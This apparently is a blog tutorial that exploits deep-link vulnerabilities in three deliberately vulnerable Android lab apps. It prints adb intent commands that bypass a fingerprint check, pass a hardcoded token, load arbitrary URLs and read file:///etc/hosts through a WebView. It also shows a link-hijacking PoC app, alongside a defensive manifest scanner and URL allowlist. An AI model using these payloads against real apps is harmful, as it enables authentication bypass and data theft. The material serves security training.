Android Deep Links exploit with 3 apps

Sisi0x
5 min read · Jun 9, 2024


Deep links types

There are three types of deep links, summarized in this picture.

As you can see, it is a hierarchy: each type is a special case of the previous one. We will explain each briefly.

1. Deep links

It handles URIs of the form `scheme://authority/path`. The scheme can be a standard one like `http`/`https` or a custom one like `app://`. The authority should have a domain structure so that ownership of the link is clear. Finally, `/path` is used to send the user to a particular activity based on your app logic.

2. Web links

As its name says, this is the URL we already know; most web links are also deep links. It handles URIs with the `http`/`https` schemes only.

3. Android app links

Android App Links are a special type of deep link that lets website URLs immediately open the corresponding content in an app. The intent filter must have the `android:autoVerify` attribute set to `true`.

Important

On Android 12 and higher, these web links no longer open the app: the browser automatically takes over handling of the intent.

Exploitation

We will exploit three intentionally vulnerable apps and show a demo of each.

===============================================================

App 1

DeepLin-app

To download the app here

We need to decompile the app with a tool like Jadx.

After that, open `AndroidManifest.xml` in Jadx.

Looking in `AndroidManifest.xml`, I found this:

That means the app is vulnerable via `DeepLink`.

As you can see, we have one hit. The `DeepLink` activity defines an intent filter that uses the deep link.
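The manifest inspection step can be automated. The following is an added example, not code from the post or from any of the three apps: a small Python scanner that parses an `AndroidManifest.xml`, reports every activity reachable through a `VIEW` + `BROWSABLE` intent filter, and classifies each filter into the three types from the first section. The manifest it scans is constructed for the demo; only the `holiday` scheme and the `DeepLink` activity name come from App 1, and the hosts and other activity names are assumptions.

```python
"""Added example: list activities reachable through deep links in an AndroidManifest.xml.

Not code from the post or from any of the three apps. The manifest below is
constructed; only the `holiday` scheme and the DeepLink activity name are
taken from App 1, everything else is an assumption for the demo.
"""
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"


def _attr(elem, name):
    """Read an android:-namespaced attribute (None if absent)."""
    return elem.get("{%s}%s" % (ANDROID_NS, name))


def classify_filter(intent_filter):
    """Classify one <intent-filter> as 'deep link', 'web link', 'app link', or None.

    A filter is reachable from a URI only if it has ACTION_VIEW, the BROWSABLE
    category and at least one <data android:scheme="...">.
    """
    actions = {_attr(a, "name") for a in intent_filter.findall("action")}
    categories = {_attr(c, "name") for c in intent_filter.findall("category")}
    if "android.intent.action.VIEW" not in actions:
        return None
    if "android.intent.category.BROWSABLE" not in categories:
        return None
    schemes = {_attr(d, "scheme") for d in intent_filter.findall("data")} - {None}
    if not schemes:
        return None
    if schemes <= {"http", "https"}:
        # Web link; it is an Android App Link only when verification is requested.
        return "app link" if _attr(intent_filter, "autoVerify") == "true" else "web link"
    return "deep link"  # custom scheme such as holiday://


def scan_manifest(xml_text):
    """Return one finding per deep-link-reachable intent filter, in document order."""
    root = ET.fromstring(xml_text)
    findings = []
    for activity in root.iter("activity"):
        for f in activity.findall("intent-filter"):
            kind = classify_filter(f)
            if kind is None:
                continue
            findings.append({
                "activity": _attr(activity, "name"),
                # An activity that declares an intent filter is exported unless it
                # explicitly says android:exported="false".
                "exported": _attr(activity, "exported") != "false",
                "kind": kind,
                "data": [(_attr(d, "scheme"), _attr(d, "host"),
                          _attr(d, "path") or _attr(d, "pathPrefix"))
                         for d in f.findall("data")],
            })
    return findings


# Constructed manifest: one custom-scheme deep link, one plain web link,
# one verified app link, and a launcher activity that must not be reported.
SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.demo">
  <application>
    <activity android:name=".DeepLink" android:exported="true">
      <intent-filter>
        <action android:name="android.intent.action.VIEW"/>
        <category android:name="android.intent.category.DEFAULT"/>
        <category android:name="android.intent.category.BROWSABLE"/>
        <data android:scheme="holiday"/>
      </intent-filter>
    </activity>
    <activity android:name=".AccountActivity" android:exported="true">
      <intent-filter>
        <action android:name="android.intent.action.VIEW"/>
        <category android:name="android.intent.category.DEFAULT"/>
        <category android:name="android.intent.category.BROWSABLE"/>
        <data android:scheme="https" android:host="example.com" android:pathPrefix="/account"/>
      </intent-filter>
    </activity>
    <activity android:name=".VerifiedActivity" android:exported="true">
      <intent-filter android:autoVerify="true">
        <action android:name="android.intent.action.VIEW"/>
        <category android:name="android.intent.category.DEFAULT"/>
        <category android:name="android.intent.category.BROWSABLE"/>
        <data android:scheme="https" android:host="example.com" android:path="/open"/>
      </intent-filter>
    </activity>
    <activity android:name=".MainActivity" android:exported="true">
      <intent-filter>
        <action android:name="android.intent.action.MAIN"/>
        <category android:name="android.intent.category.LAUNCHER"/>
      </intent-filter>
    </activity>
  </application>
</manifest>
"""

if __name__ == "__main__":
    for finding in scan_manifest(SAMPLE_MANIFEST):
        print(finding)
```

Replace `SAMPLE_MANIFEST` with the manifest text Jadx shows to scan a real APK. Every `deep link` or `web link` reported on an exported activity is an entry point that any app on the same device can trigger with `am start`, which is why the handler behind it has to validate whatever it receives.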

So, let us go to that activity and see how the deep link is handled.

The remaining code basically checks that the provided URL uses `holiday://`, that there is a query parameter `token`, and that its value equals `2100537c6456cd8a437f7734fad189a8`.

We can exploit it either with `adb` or by creating a PoC app.

1- Exploit it by creating a PoC app:

1. Add the following to `MainActivity.java` (it needs `import android.net.Uri;`):

```java
// Read the URI that launched this activity (the deep link) and print it.
Uri deepLinkURL = getIntent().getData();
System.out.println("Credentials: " + deepLinkURL.toString());
```

2. And in `AndroidManifest.xml`, add this intent filter to the activity so that it also claims the `holiday` scheme:

```xml
<intent-filter>
    <action android:name="android.intent.action.VIEW"></action>
    <category android:name="android.intent.category.BROWSABLE"></category>
    <category android:name="android.intent.category.DEFAULT"></category>
    <data android:scheme="holiday"></data>
</intent-filter>
```

2- Exploit it with `adb`:

```shell
am start -a android.intent.action.VIEW -d "holiday://whatever.login/test?token=2100537c6456cd8a437f7734fda189a8"
```

The `-a` option specifies the action; `-d` is the data passed with that action.

===============================================================

App 2

BeetleBug

To download the app here

We decompile the app with a tool like Jadx.

After that, open `AndroidManifest.xml` in Jadx.

Then look in `AndroidManifest.xml`:

As we can see, `DeeplinkAccountActivity` defines an intent filter that uses the deep link `https://beetlebug.com/account`.

Double-click on `DeeplinkAccountActivity` to go to that activity.

So, let us go to that activity and see how the deep link is handled.

The code here is simple: if the deep link is triggered, the fingerprint validation is bypassed and we go straight to the account page to get the flag. So, let's use the deep link while the fingerprint activity is running.

Exploit it with `adb`:

```shell
adb shell am start -a android.intent.action.VIEW -d "https://beetlebug.com/account"
```

The `-a` option specifies the action; `-d` is the data passed with that action.

BooooOOOoom

===============================================================

App 3

InsecureShop

To download the app here

We decompile the app with a tool like Jadx.

After that, open `AndroidManifest.xml` in Jadx.

Looking in `AndroidManifest.xml`, I found this:

As you can see, we have one hit. `WebViewActivity` defines an intent filter that uses the deep link `insecureshop://com.insecureshop`.

So, let us go to that activity and see how the deep link is handled.

In this code snippet, the developer defines a WebView component with several settings set to `true`. We are interested in two of them: `setJavaScriptEnabled`, which lets us run JavaScript in the WebView, and `setAllowUniversalAccessFromFileURLs`, which lets us use the `file://` protocol to read files on the system, such as `/etc/hosts`.

The remaining code basically checks whether the provided URL has a `/web` or `/webview` path. If it has either, it then checks for a query parameter `url`, and `webview.loadUrl` loads the given URL.

So in short, there is no sanitization of the URL provided through the deep link, so we can open arbitrary websites we control by running `adb`:

```shell
adb shell am start -a android.intent.action.VIEW -d 'insecureshop://com.insecureshop/web?url=http://sisix0.com'
```

The `-a` option specifies the action; `-d` is the data passed with that action.

Here we loaded an arbitrary URL into the WebView.

To use the `file://` protocol to read files on the system:

```shell
adb shell am start -a android.intent.action.VIEW -d 'insecureshop://com.insecureshop/web?url=file:///etc/hosts'
```

and we can get XSS.
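Both findings above (arbitrary `url` values and `file://` reads) share one root cause: nothing checks the `url` parameter before `loadUrl`. The following is an added example, not InsecureShop's code: the behaviour described in the write-up reproduced as a plain Python function, beside a hardened version that only lets `https` URLs on an allowlisted host through. The `insecureshop` scheme and the `/web` and `/webview` paths come from the write-up; the allowed host `www.insecureshop.example` and the function names are assumptions.

```python
"""Added example: allowlist-based handling of the `url` deep-link parameter.

Not code from InsecureShop. The scheme and paths are from the write-up; the
allowlisted host and the function names are assumptions for the demo.
"""
from urllib.parse import parse_qs, urlsplit

DEEP_LINK_SCHEME = "insecureshop"             # from the app's intent filter
WEBVIEW_PATHS = {"/web", "/webview"}          # paths the activity accepts
ALLOWED_HOSTS = {"www.insecureshop.example"}  # constructed allowlist (assumption)


def url_param(deep_link):
    """Return the `url` query parameter of a matching deep link, or None."""
    parts = urlsplit(deep_link)
    if parts.scheme != DEEP_LINK_SCHEME or parts.path not in WEBVIEW_PATHS:
        return None
    values = parse_qs(parts.query).get("url")
    return values[0] if values else None


def resolve_webview_target_vulnerable(deep_link):
    """Behaviour described in the write-up: whatever is in `url` gets loaded."""
    return url_param(deep_link)


def resolve_webview_target(deep_link):
    """Hardened version: only https URLs on allowlisted hosts reach loadUrl."""
    candidate = url_param(deep_link)
    if candidate is None:
        return None
    target = urlsplit(candidate)
    # The scheme check rejects file://, content://, javascript: and plain http.
    if target.scheme != "https":
        return None
    # .hostname is lowercased and excludes userinfo and port, so a value like
    # https://www.insecureshop.example@evil.example/ resolves to evil.example.
    if target.hostname not in ALLOWED_HOSTS:
        return None
    return candidate


if __name__ == "__main__":
    # Constructed sample inputs mirroring the two adb payloads above.
    for link in (
        "insecureshop://com.insecureshop/web?url=https://www.insecureshop.example/help",
        "insecureshop://com.insecureshop/web?url=http://attacker.example",
        "insecureshop://com.insecureshop/web?url=file:///etc/hosts",
    ):
        print(link, "->", resolve_webview_target_vulnerable(link),
              "| hardened:", resolve_webview_target(link))
```

In the real activity the same two checks belong directly in front of `webview.loadUrl`, and the WebView settings should be tightened at the same time: `setAllowUniversalAccessFromFileURLs(false)` and `setAllowFileAccess(false)` (both real `WebSettings` methods) close the `file://` route even if the allowlist is ever bypassed.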
